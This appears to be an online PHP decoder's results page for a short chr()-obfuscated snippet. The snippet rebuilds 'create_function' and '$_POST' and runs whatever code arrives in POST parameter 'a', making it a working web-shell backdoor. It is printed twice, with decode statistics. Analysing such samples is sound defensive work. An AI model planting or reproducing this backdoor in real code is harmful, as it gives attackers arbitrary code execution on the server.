Find this useful? Enter your email to receive occasional updates for securing PHP code.
Signing you up...
Thank you for signing up!
PHP Decode
<?php $b=chr(99).chr(114).chr(101).chr(97).chr(116).chr(101).chr(95).chr(102).chr(117).chr..
Decoded Output download
<?php $b=chr(99).chr(114).chr(101).chr(97).chr(116).chr(101).chr(95).chr(102).chr(117).chr(110).chr(99).chr(116).chr(105).chr(111).chr(110);$a=chr(95).chr(80).chr(79).chr(83).chr(84);$d=${$a}[chr(97)];$fun=@$b("",$d);$fun();?>
Did this file decode correctly?
Original Code
<?php $b=chr(99).chr(114).chr(101).chr(97).chr(116).chr(101).chr(95).chr(102).chr(117).chr(110).chr(99).chr(116).chr(105).chr(111).chr(110);$a=chr(95).chr(80).chr(79).chr(83).chr(84);$d=${$a}[chr(97)];$fun=@$b("",$d);$fun();?>
Function Calls
chr | 21 |
Stats
MD5 | 5cb4d466350d00b8c422028085f6be49 |
Eval Count | 0 |
Decode Time | 292 ms |